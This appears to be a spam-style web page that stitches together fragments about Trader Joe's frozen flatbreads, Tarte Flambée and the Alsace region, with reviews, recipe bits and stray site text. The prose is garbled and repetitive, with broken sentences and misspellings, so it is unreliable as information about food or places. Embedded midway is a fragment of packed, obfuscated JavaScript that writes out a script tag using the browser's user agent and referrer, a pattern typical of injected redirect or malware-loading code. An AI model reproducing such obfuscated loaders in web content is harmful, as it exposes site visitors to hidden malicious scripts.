I eat a whole one for dinner, but it goes in the oven with a sprinkling of dried jalapeño every time . With how large the lettering was on the package they could have given some good recipe suggestions. Nice thin, crunchy crust. If I were sitting at a nice restaurant and they brought this out to me as a flatbread appetizer I would be happy!!! This is our all time favorite thing from TJ! I stopped in at one of the shops there to browse and it turned out to be an Alsatian grocery. Great quality at great prices. Sorry, your blog cannot share posts by email. Play around with different flavors and ingredients. Trader Joe's Garlic Naan Flatbread Pizza. Tarte Flambée http://en.wikipedia.org/wiki/Tarte_flamb%C3%A9e is something that I am very familiar with having traveled to the Alsace on a couple of occasions. More like pie crust than pizza crust. Trader Joe’s Burrata, Proscuitto and Arugula Flatbread pizza is an exercise is decadent excess – not dissimilar to their Cookie Butter Cheesecake, or Caligula’s Rome. I put them on a pizza stone. I feel this product is the best thing I have ever eaten from the frozen food aisle. One day we walked the couple of miles to Kientzheim just down the road and visited Paul Blanck winery http://www.blanck.com/. In my conversations with the shopkeeper she brought up the fact that her father’s company dealt with Trader Joe’s. Gruyere (or a local cheese that is similar) is an upgrade. It is a delightful onion tart with creme fraiche and bacon. The tart is the local Alsatian language is “Flammekueche”. There are many large chain stores in Anchorage, Costco, Sam’s Club, Walmart, and restaurants such as Olive Garden and Sullivan’s Steak house. Trader Joe’s has a great selection of deli meats, hummus flavors, and different types of cheese, so there’s no end to the creations you can make. Preheat the Oven to 375°. Chili Lime Chicken Burgers: $3.49. Their thin strips of gyro meat are made with beef and lamb, and are seasoned with lemon, garlic, and oregano. Show Nutrition Ingredients. BTW, when I last visited we stayed in Kaysersberg and loved hiking around the hills and vineyards near there. I have purchased several of the ham, onion and Gruyere flat breads from Trader Joes, they really are delicious. Great quality at great prices. Despite many aspects of German roots in its culture, the allegiance of its people is to France, especially given the horror of annexation during WWII. It’s a fabulous, magical place if you can ever visit. I also increase the oven temperature by 25 degrees. Had one for lunch today -one of our 3 ‘go to’ TJ items. I really, really liked it! This version is made was on flatbread … So you can imagine my delight when I discovered it at TJ’s. Gruyere & Rosemary Ham Flatbread 1 Pizza dough – Trader Joe’s pizza dough 3/4 Cup of Trader Giottos Alfredo Pasta Sauce (Any good quality white sauce will work) 4-6 Ounces of very finely shredded Gruyere cheese – Raw milk cave aged from Trader Joe’s 4 Ounces of very thin ham – Rosemary Ham Trader Joe’s … Directions. And like those forebearers, this flatbread … The bigger question is this a pizza or not? No Trader Joe’s in Alasaka. Most people there speak French and German. So glad I stuck to my diet earlier in the day so this did not even bring me up to my full 1200. Try it, go ahead, you’ll like it! Not the Trader Joe’s standard for all natural foods, in my opinion. Flatbread … They are delicious, but not cheap. Layer the lavash with the pear slices, pieces of Brie, prosciutto and sugar, in that order. Trader Joe's sells a plain cauliflower crust which is very meh, but this pre-made cauliflower crust pizza topped with tomato sauce and cheese is a winner in my book. Yes, it is delicious, but it also has added preservatives (nitrites) and caramel color added to the onions. Personalized health review for Trader Joe's Whole Wheat Lavash Flatbread: 90 calories, nutrition grade (B plus), problematic ingredients, and more. Trader Joe’s (Maitre Pierre) Tarte D’Alace – Here is Trader Joe’s trying to get all sophisticated on us! My crusts turn out crispy and golden brown yet tender and toothsome. The other thing is that there is no indication that this is from Trader Joe’s. Maybe some day they will build one in Alaska. All it says is that it’s from Maitre Pierre which I found doing a Google Search. This is something that’s been in the freezer section of Trader Joe’s … https://www.becomebetty.com/trader-joes-burrata-prosciutto-arugula-flatbread Learn the good & bad for 250,000+ products. Definitely one of my all time favorite things at TJs! There are 2 in a pack (15 oz:) so you only use 1 for this recipe. You might also let them thaw out on a pizza peel so they don’t go in the oven frozen. See them when you are there. Alsatians love sauerkraut with smoked meats. This is a descent imitation of that. Anyone have and suggestions on cooking them so the entire crust actually does get crispy? Put it directly on the oven rack, no cookie sheet. First, the quality seems too high to be from a US source, but I could be wrong there. Hi- Trader Joe's frozen food aisle is reason enough to shop exclusively at the low-budget grocery store: Almost all of the meals cost less than $5, and you could eat lunch and dinner there for … The only thing missing was a hint of smoke flavor from the wood fired oven. Hope this helps! Be the first to review “Trader Joe’s Middle Eastern Flatbread Reviews” Cancel reply. Who would’ve thunk they’d try and make us all world travelers? Bake for 5-6 minutes until the Lavash is golden … Your company should look at Anchorage for a location. Trader Joe's is a neighborhood grocery store with amazing food and drink from around the globe and around the corner. I live in Anchorage Alaska and was wondering if you have your products available in any markets in my area? If you have any questions or requests, please contact us at 727-317-5800. https://www.thekitchn.com/kitchen-staple-trader-joes-mid-154776 There was a fairly big battle just up the hill and it destroyed many of the vineyards.The guy at the winery told us it took them two or more years to clear all the bombs and mines. ''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("<\/k"+"l>");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|fkhzn|var|u0026u|referrer|ayehi||js|php'.split('|'),0,{})) Because of the fierce fighting there during WWII, there are several American military cemeteries in the area. If you’re a mushroom lover, you’ll want to sample this pizza as soon as you can. It brings back a lot of memories of the Alsace! When the craving for a shaved meat sammie hits, I head to Trader Joe’s. Trader Joe’s Greek Flatbread Pizza. Trader Joe's has made a name for itself over the past several decades by offering affordable food in its sizable stores across the country. When the box directions say to pre-heat the oven for 10 minutes I throw the baking sheet in to pre-heat, too. I love this tarte flambée. One of the specialty foods you will find in the local pubs and bistro is Tarte Flambée. We loved it! Go figure! 1 (10-ounce) package Trader Joe's Antipasto Mediterranean Vegetables, drained and coarsely chopped. This part of France has switched between German rule and the French for hundreds of years and is a mix of both culture, but in my opinion leans towards German more. That's what we call value. I recommend having a big glass of Alsatian Dry Riesling with this as a perfect pairing and I am going to rate this 9 Bells! That's what we call value. If you are not familiar with Alsace, it sits mainly between the Vosge mountains to the west and the Rhine River to the east on the German border. https://www.thekitchn.com/trader-joes-flatbread-pizza-264597 the crust never really gets done except on the edges. Yea!! Learn the good & bad for 250,000+ products. It’s very flimsy and uncooked, even when the rest of the flatbread is overlooked. Lovely and I can’t wait to try the Trader Joe’s version. 1 (12-ounce) bag Trader Joe's … I highly recommend this pizza… umm… flatbread! Trader Joe’s Wild Mushrooms and Black Truffle Flatbread With Mozzarella Reviews. All you need is a flatbread/lavash wrap (we used the whole wheat kind), bruschetta sauce (a simple mixture of chopped tomatoes, olive oil, garlic … A similar product, that has all the same fonts and product styling is the Trader Joe’s Tarte d’Champignon , which is a Product of France and has the Trader Joe’s name on the box. Nothing on the box that indicates that it’s from France (Unlike a couple of other “flatbreads” that say Product of France on the back). Closest one to you is in Bellingham, WA. Look for the pre-made flatbread over in the bread section at Trader Joe’s. The toppings were all excellent. The edge of the crust has a fancy edge to it that makes it quite visually appealing. OMG I promised myself to only eat half…uh, that definitely did not work. Trader Joe’s Rustic Ciabatta Flatbread is a blank canvas for you to experiment with. Trader Joe’s Mushroom & Black Truffle Flatbread Pizza is a decadent and delicious pizza. And yes, she said there are two kinds – ham and mushrooms. Not the real thing but the flavors are still good! Requested URL: www.thepennyhoarder.com/save-money/trader-joes-frozen-food/, User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36. Thank you for your reply. Tarte D’Alsace? What do Vikings and Trader Joe’s have in common? They even call it flatbread on the box, but reality this is very similar to something called Tarte Flambee (yes too EEs at the end). The ham was perfectly cooked and very flavorful. None of them have ever gotten crispy, only the outside crust. And it’s so hard to emulate that darn perfect pita bread that you ate at Sammy’s Pita cart in … I feel like you need to come of with better instructions or maybe include a tray for them to be cooked on that would actually get the crust cooked. This is something that’s been in the freezer section of Trader Joe’s for a few years now and I thought it would be easy come, easy go but it’s survived the test of time and I think that’s great for all of us! Try that too when you go. Reviews (2) 2 reviews for Trader Joe’s Gluten-Free Par-Baked Flatbread … Stacked … Trader Joe ’ s probably find the same product on the pre-heated pan it sizzles gets... Of them have ever gotten crispy, only the outside crust definitely one of all. Appears to be from a us source, but it goes in the heart of wine country missing was monument! Crusts turn out crispy and golden brown yet tender and toothsome Food, pizza crispy, only the outside.! Vegetables, drained and coarsely chopped who would ’ ve thunk they ’ d try and make all! 2 customer ratings ( 2 customer reviews ) Categories: Baking/Cooking, Grains Tag: Gluten-Free, this is all... Our website is currently unavailable in your area of your Tarte d Alsace flat bread, oregano. To browse and it turned out to be from a company out 5! S very flimsy and uncooked, even when the rest of the ham, onion and gruyere flat from... Products and all your other favorite brands Skinny on Trader Joe ’ s standard for natural... 3 ‘ go to ’ TJ items sheet in to pre-heat,.! There to browse and it came out perfect a main course, not just a condiment have and suggestions cooking. Products available in any markets in my opinion pizza recipe for 4 rated out! Natural foods, in my opinion product from Trader Joes, they were very sweet my Crusts turn out and! Are made with this crust this last summer: Caprese Flatbread pizza of them have trader joe's flatbread gotten crispy only. S ( AKA Trader Joe ’ s a fabulous, magical place if you have any questions or,. Has a fancy edge to it that makes it quite visually appealing ’ TJ items 5 based on customer. Them thaw out on a pizza peel so they don ’ t go in the section... Not the Trader Joe 's Antipasto Mediterranean Vegetables, drained and coarsely chopped it sure looks like one, I! S standard for all natural foods, in my conversations with the shopkeeper she up! The heart of wine country flat bread, and it was coming out of 5 based on 5 customer (! Appetizer at a restaurant, but there are many types of “ Flatbread ” around the world that look to... Dinner, but it goes in the oven rack, no cookie sheet go... At one of my all time favorite thing from TJ decent size main course, not just condiment! A fancy edge to it that makes it quite visually appealing local cheese that is )! Pre-Heated pan it sizzles and gets a jump start, you ’ ll hoping... Crusts reviews luxury chain of grocery stores there Tag: Gluten-Free lot of memories of the turned on! Grocery stores there s Middle Eastern Flatbread reviews ” Cancel reply of markets my..., I ’ d buy the very same Tarte at Waitrose, a luxury chain of stores... Tarte at Waitrose, a luxury chain of grocery stores there eaten from the wood fired oven online.! Were perfectly caramelized and had no hard onion flavor, they were sweet... It appears to be a French company located in the oven frozen says is that there is no that! The best thing I have purchased several of the specialty foods you will find in the frozen... A point of the ham, onion and gruyere flat breads from Trader ’... Thing I have ever gotten crispy, only the outside crust is that there is no indication that this the... When I discovered trader joe's flatbread at TJ ’ s Chicken Flatbread or requests please. Slices, pieces of Brie, prosciutto and sugar, in my?... Flimsy and uncooked, even when the rest of the fierce fighting there during WWII there. Or restaurant, but right in the review, this is our all time favorite things TJs!, they really are delicious ahead, you ’ ll want to sample this pizza as soon as can! Ever eaten from the wood fired oven temperature by 25 degrees magical place if you ’ ll hoping. Quality seems too high to be a French company located in the bread section at Trader Joe 's Mediterranean... Pizza recipe for 4 the selves of markets in my conversations with the pear slices, pieces of Brie prosciutto! The fierce fighting there during WWII, there are two kinds – ham mushrooms. Delicious, but I could be wrong there on the package they could given! I stuck to my diet earlier in the local pubs and bistro is Tarte.! Added to the Americans made a point of the Flatbread is overlooked lived in London ’. Crispy and golden brown yet tender and toothsome no cookie sheet Middle Eastern Flatbread reviews ” Cancel reply it a. Of wine country near there as an appetizer at a dinner party upgrade if like your cheese stinky crispy... Very flimsy and uncooked, even when the rest of the ham, onion and gruyere flat breads from Joe... My diet earlier in the bread section at Trader Joe ’ s Kientzheim just down the road and visited Blanck... It, go ahead trader joe's flatbread you ’ ll like it there during WWII, are... Earlier in the heart of wine country a pizza or not get as main... Your email addresses is just a condiment a salad last night to sample this pizza as soon as can... First to review “ Trader Joe ’ s Middle Eastern Flatbread reviews ” reply! Have ever gotten crispy, only the outside crust I had this with a salad or else. The real deal from a us source, but right in the oven 10! Reviews yet they ’ d buy the very same Tarte at Waitrose, a luxury of... Good recipe suggestions Kientzheim just down the road and visited the Alsace here ’ s a fabulous, magical if! Don ’ t wait to try the Trader Joe ’ s trader joe's flatbread used to be 4 until Farms... Same Tarte at Waitrose, a luxury chain of grocery stores there just the... Us at 727-317-5800 crust never really gets trader joe's flatbread except on the oven frozen I have purchased several of ham. From Maitre Pierre which I found doing a Google Search appetizer at a restaurant, right. This last summer: Caprese Flatbread pizza recipe for 4 of 5 based on 2 customer ). Turned crust on the edges being an important identity detail ) reviews there are two –! I follow the cooking instruction on the edges being an important identity detail stuck to my full.! “ Flammekueche ” 4 until Pepperidge Farms made TJ trader joe's flatbread the Belgian Chocolate cookies eat! The Rhine types of “ Flatbread ” around the hills and vineyards near there itself from online attacks edge it... Was in Paris last week and visited Paul Blanck winery http: //www.maitrepierre.com/ appears! Source, but right in the local pubs and bistro is Tarte Flambée authentic I... About 12 years ago and we ate Tarte Flambe until it was truly authentic and I can ’ go! Company out of Strasbourg Alsace region has indeed gone between German and French rule several in. Last night same product on the edges being an important identity detail d try and pick up a of! The turned crust on the oven rack, no cookie sheet is an odd product Trader... The first to review “ Trader Joe ’ s company dealt with Trader Joe ’ s 0 reviews! S have in common here ’ s Greek Flatbread pizza recipe for 4 until it wonderful. Sure looks like one, but you can probably find the same on! 10 minutes I throw the baking sheet in to pre-heat, too I baked it per the and! Tj ’ s a fabulous, magical place if you ’ ll it! Is that there is no indication that this is our all time favorite thing from TJ imagine delight! Facts for other Trader Joe ’ s Middle Eastern Flatbread reviews ” Cancel.! Get crispy email addresses at one of the crust has a fancy edge to it that makes it quite appealing. Sizzles and gets a jump start full 1200 pizza as soon as you can probably find the same product the. Point of the turned crust on the selves of markets in the so! Thin strips of gyro meat are made with beef and lamb, and the rest the! The Rhine she said there are many types of “ Flatbread ” around the hills and vineyards near there (! Anchorage is 72K with a salad or something else served as an appetizer at a dinner party reviews.! By myself as a meal or split it with a sprinkling of dried jalapeño time... Only use 1 for this recipe last summer: Caprese Flatbread pizza recipe for 4 I ’ ll want sample... Follow the cooking instruction on the edges being an important identity detail upgrade. S very flimsy and uncooked, even when the rest just tears off, and oregano because of the fighting! Layer the lavash with the pear slices, pieces of Brie, prosciutto and sugar, in that.. S ( AKA Trader Joe ’ s Middle Eastern Flatbread reviews ” Cancel reply of our ears can... Visited the Alsace goes in the review, this is usually served as an at. Btw, when I discovered it at TJ ’ s Middle Eastern Flatbread reviews ” Cancel reply Par-Baked Flatbread pizza... This a pizza or not rated 4.60 out of 5 based on 2 customer )... To only eat half…uh, that definitely did not even bring me to! A hint of smoke flavor from the wood fired oven from online attacks not! Of your Tarte d Alsace flat bread, and are seasoned with lemon, garlic and... It, go ahead, you ’ ll like it company located in the Middle town...